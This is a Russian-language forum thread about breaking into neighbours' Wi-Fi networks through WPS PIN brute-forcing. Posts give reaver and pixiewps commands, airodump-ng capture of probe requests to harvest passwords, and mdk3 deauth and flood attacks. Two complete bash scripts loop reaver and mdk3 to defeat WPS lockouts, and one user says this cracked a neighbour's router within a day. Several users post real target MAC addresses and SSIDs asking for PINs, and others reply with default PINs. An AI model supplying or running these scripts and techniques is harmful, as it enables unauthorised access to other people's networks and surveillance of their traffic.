[P] PKE: f9:84:a4:df:e3:7c:66:c3:2b:13:b7:4c:93:b1:c7:ac:d8 :b7:a2:35:20:1d:25:0b:76:60:af:f2:e5:1a:ff:52:a1:4 9:8a:c3:dc:04:69:f4:71:5f:32:4f:b1:26:89:78:7a:90: f0:12:fd:36:81:5a:cc:29:4f:26:b3:12:14:9c:62:0a:86 :8a:e0:32:08:f2:81:5a:9b:82:af:3f:42:7c:5d:cc:1a:4 2:ed:dc:c3:0b:d1:9d:28:a9:89:dd:b3:8b:41:0b:db:7c: 92:be:df:e7:cd:3c:86:b4:c3:7d:94:94:c2:38:ef:41:aa :68:b7:e9:72:66:b6:3e:d8:22:ca:b9:9e:36:3f:62:d9:2 d:1a:ba:9d:c1:7c:8d:3a:bd:f8:4e:ec:df:6d:9b:f1:ef: be:60:03:b8:df:d4:01:1d:f1:11:73:00:8a:3a:67:d8:c9 :4b:b6:5b:5f:e9:d0:fa:e8:d8:09:2c:9a:3f:6c:b8:86:8 1:13:62:0a:b9:2e:3b:7f:cc<br/>
[P] WPS Manufacturer: SERCOMM<br/>
[P] WPS Model Name: RV6688BCM<br/>
[P] WPS Model Number: RV6688BCM<br/>
[P] Access Point Serial Number: 53434F4D14150793<br/>
[+] Received M1 message<br/>
[P] R-Nonce: f5:ad:86:c4:33:50:d7:0b:32:a6:12:92:6b:85:03:dd<br/>
[P] PKR: 19:c9:96:a4:52:39:de:ee:47:9d:c9:b2:d6:df:66:07:6a :48:98:c8:74:81:fb:64:2b:85:6a:f0:ad:4d:33:55:f4:4 2:73:e9:f2:6a:fa:da:6b:b5:c1:ef:3e:ec:38:a7:a4:d3: 60:99:9e:3c:f1:45:c7:05:d6:81:a2:23:a6:9d:93:27:1e :1c:ea:90:6e:c3:1a:df:a6:e6:06:1a:53:54:48:6d:44:4 5:64:1a:a4:3a:64:11:b7:34:5e:85:d4:0c:27:e9:30:de: 08:da:f1:4d:19:19:de:b1:11:4b:a4:bb:01:a6:b0:96:ad :62:0b:c4:49:bb:2e:c2:a6:be:c9:a1:02:19:e9:bd:b5:5 1:1f:ed:1a:74:7b:39:40:e5:29:81:62:e3:e1:99:df:e3: eb:89:bd:4e:f3:e0:14:b2:54:63:ec:16:ed:3c:57:66:3a :f6:e3:b5:9b:1f:e1:11:8b:eb:69:e8:f8:9d:e7:2b:a7:8 3:71:c7:95:14:96:a4:e1:b4<br/>
[P] AuthKey: 04:09:da:d7:84:0b:8c:22:0b:f4:d8:e5:22:99:74:6e:ff :21:9e:19:d1:77:fa:8f:fc:b8:23:d8:fe:01:6d:a5<br/>
[+] Sending M2 message<br/>
[P] E-Hash1: f5:56:e9:02:aa:55:03:2c:b7:83:cf:bb:9f:84:74:4d:44 :9b:c9:07:2f:eb:28:f2:8e:ff:1d:88:77:93:21:22<br/>
[P] E-Hash2: 85:17:14:1c:ad:44:92:48:c6:a7:0b:22:eb:33:60:48:84 :8e:08:4a:3f:d2:64:cf:ff:55:59:3a:c7:4e:30:15<br/>
[+] Received M3 message<br/>
[+] Sending M4 message<br/>
[+] Received WSC NACK<br/>
[+] Sending WSC NACK<br/>
[+] p1_index set to 60<br/>
[+] Pin count advanced: 60. Max pin attempts: 11000<br/>
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking<br/>
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking<br/>
<br/>
/QUOTE]
[/quote]
Если как то поможет могу системны журнал с роутера скинуть.
binarymaster
25.12.2016, 01:29
Вау ЧЕЛ ТЫ ГЕНИЙ))) ! ЭТО ГОВОРИТ ОТОМ ЧТО Я СЛОМАЮ СОСЕДЕЙ) ПИН ТАКОЙЖЕ КАК И В НАСТРОЙКАХ РОУТЕРА! КРУТЯК
Не забудьте пополнить базу 3WiFi, посканировав его Router Scan'ом.
ок сделаю! только до щитка доберусь)
Вы тут пишите:прогнать хендшейк по словарю на пин....Вопрос возник,причём тут пин к хендшейку?разве пин код найдёться прогнав хендшейк?
CRACK211
25.12.2016, 15:56
Вы тут пишите:прогнать хендшейк по словарю на пин....Вопрос возник,причём тут пин к хендшейку?разве пин код найдёться прогнав хендшейк?
Нет. Наверное имеется ввиду особенность некоторых роутеров использующих в качестве ключа от сети wpspin.например в роутерах tp-link пароли=Wps pin. Наверное есть и другие роутеры которые так работают.Соответственно найдя пароль по хендшейку можно узнать и wpspin.но при условии что дефолтный пароль не был сменён )))
Нет. Наверное имеется ввиду особенность некоторых роутеров использующих в качестве ключа от сети wpspin.например в роутерах tp-link пароли=Wps pin. Наверное есть и другие роутеры которые так работают.Соответственно найдя пароль по хендшейку можно узнать и wpspin.но при условии что дефолтный пароль не был сменён )))
та фантастика какая то)))
CRACK211
25.12.2016, 16:41
та фантастика какая то)))
Посмотрите статистику по tp-link в ветке перебора и на 3wifiчаще всего пароль 8 цифр. А на 3wifi можно увидеть что key=wps pin)))
кстати,у кого то получалось с pixie wps открыть точки,которые не попадают в список уязвимых?ну на чипе Atheros например,просто TP LINKи на таком чипе как правило.Или этот метод подходит только к тем чипам,которые в списке указыны?
кстати,у кого то получалось с pixie wps открыть точки,которые не попадают в список уязвимых?ну на чипе Atheros например,просто TP LINKи на таком чипе как правило.Или этот метод подходит только к тем чипам,которые в списке указыны?
а можно глянуть на этот список, спасибо!
а можно глянуть на этот список, спасибо!
ну вот:https://docs.google.com/spreadsheet...PTHUECQ3o9YhXR91A_p7Nnj5Y/edit#gid=2048815923
странно чесно говоря,зачем они в этот список записали роутеры,которые не уязвимы,например TP LINK
TL-WR740N,я думал список,это те роутеры,которые уязвимы,что ж они все роутеры записали,
TL-WR740N точно не уязвим,хотя может кто то и пробовал....
странно чесно говоря,зачем они в этот список записали роутеры,которые не уязвимы,например TP LINK
TL-WR740N,я думал список,это те роутеры,которые уязвимы,что ж они все роутеры записали,
TL-WR740N точно не уязвим,хотя может кто то и пробовал....
а ты столбик WPS посмотри я не вижу что он подвержен какай либо атаке из имеющейся, или просто неизвестно в описании говорится что список неполный
erwerr2321
27.12.2016, 04:10
кто знает как взломать админку на tplink?
Ну СЕРЖ знает... А чё такое то?
Случилось чего, старина?
Stas956457
27.12.2016, 16:57
я узнал пароль к точке доступа,а посмотреть какой пароль wps не могу
binarymaster
27.12.2016, 17:10
я узнал пароль к точке доступа,а посмотреть какой пароль wps не могу
Захватывайте хозяина точки. Принуждайте его силой мысли залогиниться в админке. И перехватывайте пароль к ней.
скажите,кто какие флаги вообще ставит в pixie wps dust?ну я имею ввиду,какие обязательно лучше поставить,а то их вон дофига:
Обязательныеаргументы:
-i,--interface=Имясетевогоинтерфейс адляиспользования
-b,--bssid= BSSIDточкидоступа
Опциональныеаргументы:
-m,--mac= MACхостовойсистемы
-e,--essid=ESSIDцелевойТД
-c,--channel= Установитьканал802.11дляинте рфейса(подразумевает-f)
-o,--out-file= Установитьвыводвлог-файл[stdout]
-s,--session=Восстановитьфайлпреды дущейсессии
-C,--exec=Выполнитьданнуюкоманду ослеуспешногоподборапина
-D,--daemonize Переводreaverврежимдемона
-a,--autoАвтоматическиопределить лучшиепродвинутыеопциидля целевойТД
-f,--fixed Отключитьпрыганиепоканала м
-5,--5ghzИспользоватьканалы5GHz802.11
-v,--verbose Отображатьнекритическиепр едупреждения(-vvчтобыувидетьбольше)
-q,--quiet Отображатьтолькокритическ иепредупреждения
-K--pixie-dust= [1]ЗапускаетpixiewpsсPKE,PKR,E-Hash1,E-Hash2,E-NonceиAuthkey(Ralink,Broadcom,Realtek)
-Z,--no-auto-passНЕзапускатьreaverдляавтома тическогополученияпароляWP A,еслиатакаpixiewpsпрошлауспеш но
-h,--helpПоказатьсправку
Продвинутыеопции:
-p,--pin= Использоватьзаданный4или8ц ифровойWPSпин
-d,--delay= Установитьзадержкумеждупо пыткамипина[1]
-l,--lock-delay=Установитьвремяожидани я,еслиТДзаблокировалапопы киводапина[60]
-g,--max-attempts=Выйтипослечислапопыт кпина
-x,--fail-wait= Установитьвремядляпаузыпо сле10неожиданныхнеудач[0]
-r,--recurring-delay= Делатьпаузунаyсекундкажды xпопытокпина
-t,--timeout= Установитьпиреодтаймаутап олучения[5]
-T,--m57-timeout= УстановитьпериодтаймаутаM5/M7[0.20]
-A,--no-associateНесвязыватьсясТД(связ ьдолжнабытьсделанадругимп риложением)
-N,--no-nacksНеотправлятьсообщенияNAC Kкогдаполученыпакетыонеис равности
-S,--dh-smallИспользоватьмалыеDHключ дляускоренияскоростивзло а
-L,--ignore-locksИгнорироватьзаблокиров нныесостояния,полученныео тцелевойТД
-E,--eap-terminate ЗавершатькаждуюсессиюWPSпа етомEAP FAIL
-n,--nackЦелеваяТДвсегдашлётпаке тыNACK[Auto]
-w,--win7МимикрироватьподWindows7regist rar[False]
-X,--exhaustiveУстановитьисчерпываю щийрежимсначаласессии[False]
-1,--p1-indexУстановитьначальныйинд ксмассивадляпервойполови ыпина[False]
-2,--p2-indexУстановитьначальныйинд ксмассивадлявторойполови ыпина[False]
-P,--pixiedust-loopУстановкаврежимPixieLoop(нео тправляетM4иделаетпетлюнаM3 )[False]
-W,--generate-pinГенерациядефолтныхпинов ткомандыdevttys0[1]Belkin[2]D-Link
-H,--pixiedust-log Включитьлогированиепослед овательностейзавершённыхPi xieHashes
Ну вот и какую команду,с каким набором флагов поставить?
Интересна опция -Н(
Опция -H // —pixiedust-log в reaver
Опция -H — это переключатель включения логирования PixieHashes, сохранённые хеши будут размещены в директории запуска. Эта опция требует включения хотя бы -vvv, и, соответственно, работает с -K 1 & -P.
Имена сохранённых файлов соответствуют bssid (MAC) цели и имеют расширение .pixie. Внутри этих сохранённых логов вы найдёте все требуемые хеши PixieDust, а также готовые для копипасты полные команды для использованиях их в программе pixiewps. Также есть возможность выполнить их. Просто закиньте этот файл в ваш любимый шелл и выполните его (может понадобиться chmod +x ).
И тут возникает вопрос,а как сделать эти готовые для копипасты полные команды для использованиях их в программе pixiewps. Также есть возможность выполнить их. Просто закиньте этот файл в ваш любимый шелл и выполните его (может понадобиться chmod +x ).Т.е как выполнить эти полные команды,как закинуть файл в шелл и выполнить?Так как интересная вещь,насобирал штук 10 разных,не одинаковых хешей,потом по одному выполнить и мало ли,из 10 хешей и пин может найтись!Короче вопрос,как выполнить эти команды,как эти файлы в шелл закинуть и выполнить?Кто то уже так пробовал?
binarymaster
28.12.2016, 10:59
скажите,кто какие флаги вообще ставит в pixie wps dust?
reaver -i wlanXmon -v -c X -b XX:XX:XX:XX:XX:XX -K 1
Что ещё нужно для счастья? Ну конечно же мануал, переведённый гугл транслейтом, и избавленный от лишних пробелов.
reaver -i wlanXmon -v -c X -b XX:XX:XX:XX:XX:XX -K 1
Что ещё нужно для счастья? Ну конечно же мануал, переведённый гугл транслейтом, и избавленный от лишних пробелов.
та это самая обычная команда,а флагов то вон полно,неужели все ненужные?
binarymaster
29.12.2016, 00:47
та это самая обычная команда,а флагов то вон полно,неужели все ненужные?
По ситуации. Иногда использую "-d 0", когда точка быстро обрабатывает пины.
По ситуации. Иногда использую "-d 0", когда точка быстро обрабатывает пины.
она как быстро обрабатывает,так и быстро лочится))))сейчас это уже редкость,точки,на которых спокойно пины перебирать можно,сейчас все точки в лок уходят и как правило до ребута....
binarymaster
29.12.2016, 01:26
она как быстро обрабатывает,так и быстро лочится))))сейчас это уже редкость,точки,на которых спокойно пины перебирать можно,сейчас все точки в лок уходят и как правило до ребута....
Как повезёт. Старенькие D-Link, которые всё ещё стоят за окошками ни в чём не подозревающих юзверей, до сих пор встречаются. И у меня самого такой стоял однажды, со включённым WPS, около 3-х лет! (да, я тогда ещё не знал, мы все когда-то не знали).
Как повезёт. Старенькие D-Link, которые всё ещё стоят за окошками ни в чём не подозревающих юзверей, до сих пор встречаются. И у меня самого такой стоял однажды, со включённым WPS, около 3-х лет! (да, я тогда ещё не знал, мы все когда-то не знали).
везёт тебе,у меня вокруг одни тп линки.которые лочаться до перезагруза и доссу не подвержены,пофиг им досс....
erwerr2321
29.12.2016, 04:42
может кто подскажет)
ну ваще хз, мен, может СЕРЖ?
везёт тебе,у меня вокруг одни тп линки.которые лочаться до перезагруза и доссу не подвержены,пофиг им досс....
1.подключись к сетке на месяц и RS проскань,и будет тебе счастье.
2.дай соседу 500р. типа срочно нужен инет и делай с точкой что хочешь(мне помогло на прошлой квартире там Хувеи РТК стояли с дефпаролями,включил пин и усё)
3. зайди на НГ к соседу и спроси пароль
http://images.vfl.ru/ii/1483002690/71a4b2e9/15490344.jpg
Stanley_Overman
03.01.2017, 11:54
Всех с наступившим Новым годом и наступающим Рождеством (кто что отмечает)! Может кто готов в эти нелегкие времена прийти на помощь ближнему и поспособствовать в добывании pin:
SSID: ELTEX-EE9E
A8:F9:4B:60:EE:9F
Премного благодарен!
кто уже так пробовал в pixiewps
reaver -i wlan0mon -vvv -P -H -K 1 -b 00:00:00:00:00:00 -c 1?я имею ввиду опция -Н,т.е сбор хешей,ну насобирать тясячи таких хешей,а они то все разные,а потом
chmod a+x 000000000000.pixie
./000000000000.pixie
Я так попробовал,мин 5 собирал хешы,потом их все запустил,нифига))не по одному хешу не найден пин))
Вот и спрашиваю,кто то так пробовал,у кого получалось из десяток,сотен,тысяч и тд хешей,найти пин?Кстати в этой команде и -К не нужно ставить,если уж захотели хешей насобирать...
Да, по этим словарям уже прогнал, не то. Видимо, это какая-то обновленная версия прошивки. Неделю назад соседям установили такой же роутер. Сигнал еще лучше, чем у первой жертвы. Однако, WPS тоже не брутится. Судя по всему, алгоритм в роутере вычисляет попытку брута и включает некую защиту: в какой-то момент типа принимает первую часть пина, ну а вторую часть бесконечно динамит. Кто-нибудь знает, как обойти эту защиту?
У вас получилось узнать wpa key к Ростелекомовскому ZTE ZXHN H118N? Я так же Reaver'ом прошёлся безрезультатно.
startless
10.01.2017, 03:07
У вас получилось узнать wpa key к Ростелекомовскому ZTE ZXHN H118N? Я так же Reaver'ом прошёлся безрезультатно.
Перепробовал все методы, что были доступны. Результата нет. Забросил. Через wps безсмысленно пытаться. Тут либо брутить хендшейки, либо мониторить airodump'ом эфир в надежде, что пароль проскочит.
Перепробовал все методы, что были доступны. Результата нет. Забросил. Через wps безсмысленно пытаться. Тут либо брутить хендшейки, либо мониторить airodump'ом эфир в надежде, что пароль проскочит.
а как он там проскочить может?все б так наверное ловили бы))
Linksach
11.01.2017, 00:08
а как он там проскочить может?все б так наверное ловили бы))
он видимо имел ввиду появление пароля при подключении клиента к сети при мониторинге airodumpom
он видимо имел ввиду появление пароля при подключении клиента к сети при мониторинге airodumpom
та никакой пароль в открытом виде не может проскочить,в зашифрованом это да,а то все б так ловили
Linksach
11.01.2017, 01:02
та никакой пароль в открытом виде не может проскочить,в зашифрованом это да,а то все б так ловили
а он разве писал про пароль в открытом виде,читайте внимательно?
в его сообщении говорится просто про пароль-что значить пойманный хендшейк
а он разве писал про пароль в открытом виде,читайте внимательно?
в его сообщении говорится просто про пароль
он наверняка так и думал,что в открытом виде,а в закрытом и так спокойно поймать можно...
Linksach
11.01.2017, 01:10
он наверняка так и думал,что в открытом виде,а в закрытом и так спокойно поймать можно...
без наличия клиента пароль (хендшейк)не поймаешь никак хоть год сиди и мониторь
без наличия клиента пароль (хендшейк)не поймаешь никак хоть год сиди и мониторь
кстати,а отследить pin wps интересно возможно,тем же wireshark например?было бы интересно так пины добывать
Linksach
11.01.2017, 01:30
кстати,а отследить pin wps интересно возможно,тем же wireshark например?было бы интересно так пины добывать
нет,нельзя-вайришарком можно только мониторить сеть,следить за трафиком и куда клиент заходит, и в результате
познакомится с человеком поближе!
можно помоему перехватить пароли авторизации от сайтов-но я не пробовал
startless
11.01.2017, 06:09
http://images.vfl.ru/ii/1484096718/7cd2547c/15617896.jpg
Пароль в открытом виде искать в поле Probe. В подавляющем большинстве случаев здесь или название сети, или название устройства, или прочий бред. Пароль может быть только в том случае, если кто-то указал его в качестве названия своего гаджета (даже не подозревая, что гаджет будет им светить всюду ). Понять, что это пароль, можно только по косвенным признакам: должно быть не менее 8 символов и он не должен совпадать с названием ассоциированной точки (как правило). Ну а проверить валидность пароля - либо попробовать с ним подключиться, либо ловить хендшейки у ассоциированных пар и, выдернув последовательности символов из Probe, брутить.
либо мониторить airodump'ом эфир в надежде, что пароль проскочит
Согласен, попадают пароли.
airodump-ng mon0 -w /root/Desktop/log
и
mdk3 mon0 d
Оставил записывать на несколько часов и в результате нашел в логах 2 пароля которые здесь не могли подобрать
Согласен, попадают пароли.
airodump-ng mon0 -w /root/Desktop/log
и
mdk3 mon0 d
Оставил записывать на несколько часов и в результате нашел в логах 2 пароля которые здесь не могли подобрать
как потом из лога именно пароли нашёл?как фильтр прописал?
а можно ли перебрать пины,без отправки пакета М4?т.е только М1,М2,М3?
binarymaster
11.01.2017, 21:38
а можно ли перебрать пины,без отправки пакета М4?
Любое отклонение от стандарта - не есть хорошо. Будет неопределённое поведение, в зависимости от программы в прошивке роутера.
Как это проверить на практике? Изменить исходный код reaver, например, и пересобрать его.
Любое отклонение от стандарта - не есть хорошо. Будет неопределённое поведение, в зависимости от программы в прошивке роутера.
Как это проверить на практике? Изменить исходный код reaver, например, и пересобрать его.
та просто таким образом можно было бы исключить блокировку wps при переборе,т.е роутер не смог бы что либо заподозрить,если не отправлять пакет М4 и тем самым не будет лока wps(но это в теории)
как потом из лога именно пароли нашёл?как фильтр прописал?
Да там все просто... Открываешь сохраненный *.csv и в колонке Probed ESSIDs смотришь... среди названий точек попадают и пароли...но это редкость
но это редкость
После MDK3 не такая уже и редкость.
Особенно недалекие люди начинают с матюками вводить многократно пароли и названия точки и в итоге результат.
После MDK3 не такая уже и редкость.
Особенно недалекие люди начинают с матюками вводить многократно пароли и названия точки и в итоге результат.
Ну да, MDK3 делает хорошую дискотеку в эфире, хендшейки летят... Но мне кажется что пароли проходят через подключения со смартфонов... хотя хз...
Да там все просто... Открываешь сохраненный *.csv и в колонке Probed ESSIDs смотришь... среди названий точек попадают и пароли...но это редкость
так а как понять,что это именно пароли?а пин кода wps там не попадается?
После MDK3 не такая уже и редкость.
Особенно недалекие люди начинают с матюками вводить многократно пароли и названия точки и в итоге результат.
mdk3 с какими именно параметрами?там же опций много....mdk3 на деаут клиентов что ли?
Ну да, MDK3 делает хорошую дискотеку в эфире, хендшейки летят... Но мне кажется что пароли проходят через подключения со смартфонов... хотя хз...
та если бы не хендшейки летели,а пароли в открытом виде или пины wps,то цены не было бы
Подскажите, как разблокировать WPS у роутера TL-WR841 без сброса к заводским настройкам? WPS заблокировался после попыток подбора PIN-кода. Перезагрузка роутера не помогает.
Подскажите, как разблокировать WPS у роутера TL-WR841 без сброса к заводским настройкам? WPS заблокировался после попыток подбора PIN-кода. Перезагрузка роутера не помогает.
Зайти в админку роутера и включить WPS
http://www.tp-linkru.com/faq-87.html
Руководство:
http://static.tp-link.com/res/down/doc/TL-WR841ND_V11_UG.pdf
ПУНКТ 4.4 WPS
И учитесь пользоваться поиском!
Зайти в админку роутера и включить WPS
http://static.tp-link.com/res/down/doc/TL-WR841ND_V11_UG.pdf
Снял галочку напротив Отключить PIN-код маршрутизатора и WPS заработал. Выходит, после атаки автоматически включается эта настройка.
binarymaster
14.01.2017, 14:28
Выходит, после атаки автоматически включается эта настройка.
Точнее, после нескольких неверных попыток, да.
binarymaster
14.01.2017, 23:11
пожалуйста помогите взломать dlink или netis по wps. Как их лучше взломать?
Лучше всего кувалдой, но если таковой не имеется, и монтировка сойдёт.
И предвещая негодование от моего ответа, подскажу, что эти предоставленные названия ничего не говорят, нужно больше данных.
DSL2650NRU
15.01.2017, 10:52
та я уже не раз пробивал все mac адреса на 3wifi.stascorp,ни один пароль не подошел,поэтому и спрашиваю может есть другой способ или сайт?
Ривер с пикси. Также у длинков очень часто используют статичный или легко вычисляемый пароль.
qwertys76
16.01.2017, 20:07
та я уже не раз пробивал все mac адреса на 3wifi.stascorp,ни один пароль не подошел,поэтому и спрашиваю может есть другой способ или сайт?
напишите названия моделей этих роутеров. больше будет вариантов подсказок
Пару дней назад сломал соседа TP-Link который был в локе пол года. Мне в личку написал 4pips за что ему большое СПАСИБО, и дал скрипт с помощью которого он ломал TP-Link_и при помощи mdk3.
Использую скрипт от VladimirV.
Есть проблема, reaver не останавливается после десятой попытки (ключ -g 10), а продолжает пытаться подбирать пин дальше:
[+] p1_index set to 160
[+] Pin count advanced: 160. Max pin attempts: 10
[+] 2000.00% complete. Elapsed time: 0d0h2m6s.
[+] Estimated Remaining time: 0d0h2m6s
Из-за этого не может запуститься mdk3.
Кто с таким сталкивался, как это победить?
Спасибо, VladimirV за помощь. Было пару трудностей. Может кому-то понадобиться.
killall -s INT -w reaver - добавил эти два ключа, иначе буксует на месте, не сохраняет последний пин перед закрытием reaver.
reaver -a - ключ убирает запрос: продолжить предыдущую сессию.
"mdk3 mon0 a -a 10:FE:ED:5A:XX:XX -m"; -m без этого ключа у меня, TP-Link не сбрасывал счетчик 10 неудачных попыток.
grek-6630
18.01.2017, 21:56
Пару дней назад сломал соседа TP-Link который был в локе пол года. Мне в личку написал 4pips за что ему большое СПАСИБО, и дал скрипт с помощью которого он ломал TP-Link_и при помощи mdk3.
Вот его код:
#!/bin/sh
while true;
# Run reaver to work 50s
do timeout -s SIGINT 50s reaver -i mon0 -b 64:66:B3:AC:XX:XX -N -S -L -s /etc/reaver/6466B3ACXXXX.wpc -v;
sleep 4;
# Run mdk3 to work 10s
echo [+] Mdk3 is working ...
timeout 10s mdk3 mon0 a -a 64:66:B3:AC:XX:XX -m &>/dev/null;
echo [+] Mdk3 finished, waiting ... Good time to interrupt script if you need [Ctrl+C] ;
sleep 24;
done;
У меня он не заработал и я его переделал:
#!/bin/bash
while true;
# Run reaver to work 10 pin
echo
echo
echo [+] reaver is working ...
do
reaver -i mon0 -b 10:FE:ED:5A:XX:XX -vv -L -g 10 -s /etc/reaver/10FEED5AXXXX.wpc;
# Run mdk3 to work 3s
echo
echo
echo [+] Mdk3 is working ...
gnome-terminal --geometry 10x10-1-1 --title='mdk3' -e "mdk3 mon0 a -a 10:FE:ED:5A:XX:XX";
sleep 3;
killall mdk3 2> /dev/null;
echo [+] Mdk3 finished, waiting ... Good time to interrupt script if you need [Ctrl+C];
sleep 14;
done;
и меньше чем за сутки взломал эту сеть!
sleep 3 - это сколько секунд шарашит mdk3
sleep 14 - пауза до появления точки в эфире
-g 10 - сколько пинов перебирать
Точка от меня через перекрытие и я поставил подбор на 10 пинов но если при подборе были ошибки то reaver зависал и надо было нажать ctrl+c.
Скорость перебора reaver была 2 пина в секунду + пауза + работа mdk3 + поиск точки reaverom по каналам = 48 - 50 секунд на 10 пинов.
Эти команды в терминале вводить надо? Или скрипт куда то помещать надо?
VladimirV
18.01.2017, 22:14
Эти команды в терминале вводить надо? Или скрипт куда то помещать надо?
Нашел переделанный скрипт, проверю, выложу.
binarymaster
19.01.2017, 11:12
Куда его поместить нужно?
Куда угодно, но чтобы к нему при этом доступ из терминала был.
а как скрипт правильно запустить?
Перейти в директорию со скриптом, дать права на исполнение, а затем запустить.
cd TpLink/
chmod +x TpLink.sh
./TpLink.sh
grek-6630
19.01.2017, 12:47
Куда угодно, но чтобы к нему при этом доступ из терминала был.
Перейти в директорию со скриптом, дать права на исполнение, а затем запустить.
cd TpLink/
chmod +x TpLink.sh
./TpLink.sh
Этот скрипт для TpLink только или для любого роутэра? Которая мне нужна сетка ASUS ( роутэр ) , подойдет ли ?
binarymaster
19.01.2017, 13:53
Этот скрипт для TpLink только или для любого роутэра? Которая мне нужна сетка ASUS ( роутэр ) , подойдет ли ?
В этой области нельзя ничего сказать заранее.
Доброго времени! прошу помочь с подключением к:
Роутер: Asus Rt n10 lx
Мак: 54:04:A6:5C:30:9C
DSL2650NRU
24.01.2017, 20:29
Доброго времени! прошу помочь с подключением к:
Роутер: Asus Rt n10 lx
Мак: 54:04:A6:5C:30:9C
Асус-пин пробовали? 00286022
И статический - 73782575
ilya_mail
24.01.2017, 23:10
Добрый вечер есть данный мас 74:B5:7E:E3:99:04
Подписанный как UKrtelrcom_e39904
Pin locked
Как попробовать его взломать?
То есть правильно я понял - волшебный скрипт работает с уже наглухо лоченой точкой? И она будучи лоченой - отвечает?!
Если так то прям ВАУ
ilya_mail
25.01.2017, 01:04
То есть правильно я понял - волшебный скрипт работает с уже наглухо лоченой точкой? И она будучи лоченой - отвечает?!
Если так то прям ВАУ
Что мне предпринять пин я через телефон пробил 49158441
ilya_mail
25.01.2017, 07:46
Что мне предпринять пин я через телефон пробил 49158441
Попробовал через утилиту qss но результата нет
Асус-пин пробовали? 00286022
И статический - 73782575
спасибо, к сожалению, ни тот ни другой не подходят.
g-n0m_ru
30.01.2017, 12:38
Доброго времени суток!!!
Меня тут коснулась одна проблема .. есть некий роутер D-link dir-300nru , на него мне удалось получить WPS и пароль на Wifi и пароль на админку.
Но радость кончилась , т.к. хозяин роутера запретил WPS, сменил пасс на Wifi.... и сделал точку скрытой
Зная WPS pin как я могу залезать на него... пробовал знаменитый Скрипт https://github.com/r0bag/pentest/blob/master/ReVdK3-r3.sh..
Но точка не поддается...и проблема в том что ReVdK3 начинает с начала каждый раз перебор WPS.. где он хранит лог сессии ? чтобы я смог поставить нужный WPS PIN может он все же после длительного времени сможет пробиться ???
Или посоветуйте что нить как мне ломануться на точку...Подбор пароля по рукопожатиям не вариант зная способности хозяина точки ..
Жду советов!
Спасибо заранее..
Доброго времени суток!!!
Меня тут коснулась одна проблема .. есть некий роутер D-link dir-300nru , на него мне удалось получить WPS и пароль на Wifi и пароль на админку.
Но радость кончилась , т.к. хозяин роутера запретил WPS, сменил пасс на Wifi.... и сделал точку скрытой
Зная WPS pin как я могу залезать на него... пробовал знаменитый Скрипт https://github.com/r0bag/pentest/blob/master/ReVdK3-r3.sh..
Но точка не поддается...и проблема в том что ReVdK3 начинает с начала каждый раз перебор WPS.. где он хранит лог сессии ? чтобы я смог поставить нужный WPS PIN может он все же после длительного времени сможет пробиться ???
Или посоветуйте что нить как мне ломануться на точку...Подбор пароля по рукопожатиям не вариант зная способности хозяина точки ..
Жду советов!
Спасибо заранее..
Вы сами ответили на свой вопрос: хозяин роутера запретил WPS, поэтому ReVdK3-r3 работать с этой точкой не будет. Ловите хендшейк и выкладывайте в тему подбора.
g-n0m_ru
30.01.2017, 12:48
Я конечно могу и ошибаться ,но ReVdK3-r3 и был задуман для случаев с WPS Locked.. аля залезать через задню дверь с помощью лома.
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot